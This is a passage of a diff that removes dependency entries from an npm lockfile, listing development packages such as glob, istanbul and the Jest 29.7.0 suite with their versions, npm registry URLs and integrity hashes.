{ - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "dev": true - }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "requires": { - "minipass": "^3.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "dev": true - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "dev": true, - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "requires": { - "hasown": "^2.0.2" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "dev": true, - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "requires": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - 